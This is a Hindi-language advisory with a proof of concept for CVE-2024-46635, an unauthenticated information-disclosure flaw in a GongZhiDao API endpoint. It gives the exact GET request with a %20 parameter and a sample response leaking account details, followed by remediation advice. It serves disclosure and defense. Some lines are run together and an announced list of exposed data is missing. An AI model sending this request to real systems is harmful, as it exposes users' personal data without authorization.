
CVE-2024-46635 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: GongZhiDao सिस्टम के API एंडपॉइंट में एक अनुचित इनपुट सत्यापन भेद्यता जो बिना प्रमाणीकरण के संवेदनशील उपयोगकर्ता जानकारी को उजागर करती है।
गोंगझिदाओ प्रणाली एक प्लेटफॉर्म है जिसे गोंगझिदाओ द्वारा विकसित किया गया है। यह उपयोगकर्ता प्रबंधन, डेटा विश्लेषण और परिचालन कार्यक्षमताओं सहित उद्यम समाधान प्रदान करता है। हालाँकि, एक API एंडपॉइंट में एक सुरक्षा कमजोरी पाई गई जो उचित प्राधिकरण के बिना संवेदनशील उपयोगकर्ता जानकारी के संपर्क में आने का कारण बन सकती है।
गोंगझिदाओ प्रणाली के /oaa/api/AccountMaster/GetCurrentUserInfo API एंडपॉइंट में एक कमजोरी मौजूद है। UserNameOrPhoneNumber पैरामीटर के स्थान पर %20 (एक URL-एन्कोडेड स्थान) पास करने पर, API उचित प्रमाणीकरण या प्राधिकरण के बिना भी खाता आईडी, उपयोगकर्ता नाम और ईमेल पता सहित संवेदनशील उपयोगकर्ता जानकारी के साथ प्रतिक्रिया देता है। यह अनुचित इनपुट सत्यापन हमलावरों को संवेदनशील डेटा तक अनधिकृत पहुँच प्राप्त करने की अनुमति देता है।
इस कमजोरी के सफल शोषण से संवेदनशील उपयोगकर्ता डेटा का खुलासा हो सकता है, जिसमें शामिल हैं:
एक हमलावर इस जानकारी का उपयोग पहचान चोरी या फ़िशिंग जैसे आगे के हमलों को अंजाम देने के लिए कर सकता है।
कमजोरी का शोषण करने के लिए, हमलावर को कमजोर API एंडपॉइंट पर एक तैयार HTTP GET अनुरोध भेजना होगा:
GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2
यह अनुरोध 200 OK प्रतिक्रिया देता है जिसमें JSON प्रारूप में संवेदनशील उपयोगकर्ता डेटा होता है:
HTTP/2 200 OK
Date: Tue, 10 Sep 2024 03:25:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 153
Server: nginx/1.22.0
X-Powered-By: ASP.NET
Set-Cookie: Path=/; HttpOnly; Secure
{"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"John","phoneNumber":null,"userName":"19999999999","email1":"[email protected]"}
/oaa/api/AccountMaster/GetCurrentUserInfoUserNameOrPhoneNumber जिसमें इनपुट के रूप में %20 हैउचित इनपुट सत्यापन लागू करें: सुनिश्चित करें कि UserNameOrPhoneNumber पैरामीटर उचित रूप से साफ और मान्य किया गया है। %20 जैसे इनपुट को अस्वीकार किया जाना चाहिए।
प्राधिकरण जाँच: उचित प्राधिकरण तंत्र लागू करें ताकि केवल प्रमाणित और अधिकृत उपयोगकर्ता ही संवेदनशील जानकारी तक पहुँच सकें।
दर सीमित करना और निगरानी: API एंडपॉइंट पर दर सीमित लागू करें ताकि ब्रूट फोर्स या स्वचालित हमलों को रोका जा सके, और असामान्य पहुँच पैटर्न के लिए API गतिविधि की निगरानी करें।
यह कमजोरी hithub द्वारा खोजी गई।